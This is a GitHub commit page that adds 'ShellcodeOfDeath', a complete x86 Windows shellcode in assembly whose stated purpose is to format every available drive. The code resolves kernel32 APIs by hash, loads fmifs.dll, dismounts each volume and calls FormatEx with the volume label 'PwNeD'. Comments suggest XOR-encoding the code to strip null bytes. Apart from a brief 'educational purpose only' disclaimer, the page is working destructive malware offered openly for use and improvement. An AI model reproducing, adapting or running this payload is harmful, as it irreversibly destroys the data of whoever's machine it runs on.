Skip to content

Commit 9be6b07

Browse files
hacksysteamhacksysteam
committed
Create ShellcodeOfDeath.s
ShellcodeOfDeath has been designed to format all the available drive on Windows. Disclaimer: This shellcode is developed for educational purpose only. The author is not and will not hold any responsibility for any illegal or unauthorized use of #ShellcodeOfDeath. Any use of this shellcode is at the reader’s own risk. Home Page: http://hacksys.vfreaks.com/ Post Link: http://hacksys.vfreaks.com/research/shellcode-of-death.html You may download Shellcode Of Death archive from the above link.
1 parent 480fb87 commit 9be6b07

1 file changed

Lines changed: 255 additions & 0 deletions

File tree

ShellcodeOfDeath.s

Lines changed: 255 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,255 @@
1+
/*
2+
* _ __ _____
3+
* /\ /\__ _ ___| | __/ _\_ _ ___ /__ \___ __ _ _ __ ___
4+
* / /_/ / _` |/ __| |/ /\ \| | | / __| / /\/ _ \/ _` | '_ ` _ \
5+
* / __ / (_| | (__| < _\ \ |_| \__ \ / / | __/ (_| | | | | | |
6+
* \/ /_/ \__,_|\___|_|\_\\__/\__, |___/ \/ \___|\__,_|_| |_| |_|
7+
* |___/
8+
* http://hacksys.vfreaks.com/
9+
* hacksysteam@hotmail.com
10+
*
11+
* Shellcode Of Death
12+
* v1.0
13+
*
14+
* Ruei-Min Jiang (@mike820324) a.k.a MicroMike
15+
* Ashfaq Ansari (ashfaq_ansari1989@hotmail.com)
16+
*
17+
* Still a lot can be done to improve this shellcode. This is the first release.
18+
* Further, a lot of improvement and optimization can be done to this shellcode.
19+
* Any bugs, suggestions or contribution is most welcomed.
20+
*
21+
* Lenth of shellcode: 387 bytes
22+
* Number of NULL byte: 49
23+
*
24+
* Notes: There are more NULL bytes due to a fact that few of the Windows API used
25+
* accepts input in UNICODE format. Still, NULL bytes can be reduces further.
26+
* We can use any simple encoder to xor encode the shellcode and eventually
27+
* eliminate NULL bytes.
28+
*
29+
* Things to do:
30+
* 1. Code cleanup
31+
* 2. Optimization
32+
* 3. Minification
33+
* 4. Add suggestions
34+
*/
35+
.globl _main
36+
37+
_main:
38+
jmp start_shell;
39+
/*
40+
* %edx store the base address of kernel32.dll (input)
41+
* %ebx points to the start of symbal name table (input)
42+
* %ecx contains the destination hash value (input)
43+
* %eax is the index_counter (output)
44+
*/
45+
hash_function:
46+
xorl %eax,%eax;
47+
next_entry:
48+
mov (%ebx,%eax,4), %esi;
49+
addl %edx, %esi;
50+
push %ebx;
51+
push %eax;
52+
xor %ebx, %ebx;
53+
continue_hash:
54+
xor %eax, %eax;
55+
lodsb;
56+
rol $5, %ebx;
57+
addl %eax, %ebx;
58+
cmp $0, %eax;
59+
jnz continue_hash;
60+
ror $5, %ebx;
61+
cmp %ecx, %ebx;
62+
pop %eax;
63+
pop %ebx;
64+
je hash_finish;
65+
inc %eax;
66+
jmp next_entry;
67+
hash_finish:
68+
ret;
69+
70+
/*
71+
* input:
72+
* set %edx to the dll base address
73+
* set %ecx as the hash value you want to compare
74+
* output:
75+
* %eax is the API address
76+
*/
77+
get_address:
78+
PE_init:
79+
movl %edx, %eax;
80+
movl 0x3c(%eax), %eax;
81+
movl 0x78(%edx, %eax), %eax;
82+
leal (%edx, %eax), %eax;
83+
pushl %eax;
84+
movl 0x20(%eax), %eax;
85+
leal (%edx, %eax), %ebx;
86+
call hash_function;
87+
88+
popl %ebx;
89+
movl 0x24(%ebx), %ecx;
90+
leal (%edx, %ecx), %ecx;
91+
movw (%ecx, %eax, 2), %ax;
92+
andl $0x0000ffff, %eax;
93+
94+
movl 0x1c(%ebx), %ebx;
95+
leal (%edx, %ebx), %ebx;
96+
movl (%ebx, %eax, 4), %eax;
97+
leal (%edx, %eax), %eax;
98+
ret;
99+
/*
100+
* hash value for each API
101+
* LoadLibraryA = 0x331adddc
102+
* CloseHandle = 0xd7629096
103+
* CreateFileA = 0xcfb0e506
104+
* ExitProcess = 0xec468f87
105+
* Sleep = 0x567a110
106+
* DeviceIOControl = 0x3b34d4a7
107+
* --------------fmifs.dll---------------
108+
* FormatEx = 0xab025b64
109+
*/
110+
start_shell:
111+
set_Kernel32_env:
112+
xorl %ecx, %ecx
113+
movl %fs:0x30, %eax;
114+
movl 0xc(%eax), %eax;
115+
movl 0x1c(%eax), %eax;
116+
next_module:
117+
movl 0x8(%eax), %edx;
118+
movl 0x20(%eax), %edi;
119+
movl (%eax), %eax;
120+
cmp 0x18(%edi), %cl;
121+
jne next_module;
122+
123+
set_hash_table:
124+
pushl $0xab025b64;
125+
pushl $0x0567a110;
126+
pushl $0x3b34d4a7;
127+
pushl $0xd7629096;
128+
pushl $0xec468f87;
129+
pushl $0xcfb0e506;
130+
pushl $0x331adddc;
131+
movl %esp, %ebp;
132+
end_hash_table:
133+
set_api_table:
134+
init_variable:
135+
pushl $7;
136+
popl %ecx;
137+
xorl %edi, %edi;
138+
loop_start:
139+
cmp $1, %ecx;
140+
jne set_kernel32_api;
141+
set_fmifs_env:
142+
pushl %ecx;
143+
jmp data_string;
144+
back_to_here:
145+
restore_loadlibrary:
146+
movl 0x1c(%esp), %eax;
147+
call *%eax;
148+
movl %eax, %edx;
149+
popl %ecx;
150+
set_kernel32_api:
151+
pushl %ecx;
152+
movl (%ebp, %edi, 4), %ecx;
153+
call get_address;
154+
popl %ecx;
155+
pushl %eax;
156+
inc %edi;
157+
loop loop_start;
158+
movl %esp, %ebp;
159+
jmp start_main_code;
160+
data_string:
161+
call back_to_here;
162+
.string "fmifs.dll";
163+
164+
start_main_code:
165+
Get_string_addr:
166+
jmp 2f;
167+
1:;
168+
popl %esi;
169+
Format_start_loop:
170+
pushl $23;
171+
popl %ecx;
172+
format_loop_start:
173+
movl %ecx, %edi;
174+
175+
CreateFile_call:
176+
xorl %edx, %edx;
177+
pushl %edx;
178+
pushl %edx;
179+
pushl $3;
180+
pushl %edx;
181+
pushl $3;
182+
pushl $0xc0000000;
183+
pushl %esi;
184+
movl 0x14(%ebp), %ebx;
185+
call *%ebx;
186+
Store_File_Handle:
187+
pushl %eax;
188+
subl $0x4, %esp;
189+
xorl %edx, %edx;
190+
DeviceIOControl_call:
191+
pushl %edx;
192+
leal 0x4(%esp), %ebx
193+
pushl %ebx;
194+
pushl %edx;
195+
pushl %edx;
196+
pushl %edx;
197+
pushl %edx;
198+
pushl $0x90020;
199+
pushl %eax;
200+
movl 0x8(%ebp), %ebx
201+
call *%ebx;
202+
close_file_handle:
203+
pushl 0x4(%esp);
204+
movl 0xc(%ebp), %ebx;
205+
call *%ebx;
206+
207+
FormatEx_call:
208+
leal call_back-string_start(%esi),%eax;
209+
pushl %eax;
210+
pushl $4096;
211+
pushl $1;
212+
leal volume_label-string_start(%esi), %eax;
213+
pushl %eax;
214+
leal string2_start-string_start(%esi), %eax;
215+
pushl %eax;
216+
pushl $0xc;
217+
leal 0x8(%esi), %eax;
218+
pushl %eax;
219+
movl (%ebp), %ebx;
220+
call *%ebx;
221+
sleep_call:
222+
pushl $200;
223+
movl 0x4(%ebp), %ebx
224+
call *%ebx;
225+
loop_end:
226+
movl %edi, %ecx
227+
addl $1, 0x8(%esi);
228+
loop format_loop_start;
229+
230+
exit_process:
231+
push $0;
232+
movl 0x10(%ebp), %ebx;
233+
call *%ebx;
234+
2:;
235+
call 1b;
236+
string_start:
237+
.byte 0x5c, 0x00, 0x5c, 0x00, 0x2e, 0x00, 0x5c, 0x00, 0x43, 0x00, 0x3a, 0x00, 0x5c, 0x00, 0x00, 0x00
238+
string2_start:
239+
.byte 0x4e, 0x00, 0x54, 0x00, 0x46, 0x00, 0x53, 0x00, 0x00, 0x00
240+
/*
241+
* Volume Label
242+
* Set the name of the Volume label
243+
* after formatting the respective volume.
244+
* Modify volume_label as you desire.
245+
* Deafult value -- PwNeD
246+
*/
247+
volume_label:
248+
.byte 0x50, 0x00, 0x77, 0x00, 0x4E, 0x00, 0x65, 0x00, 0x44, 0x00, 0x00, 0x00
249+
call_back:
250+
push %ebp;
251+
movl %esp, %ebp;
252+
xorl %eax, %eax;
253+
inc %eax;
254+
pop %ebp;
255+
ret $0xc;

0 commit comments

Comments
 (0)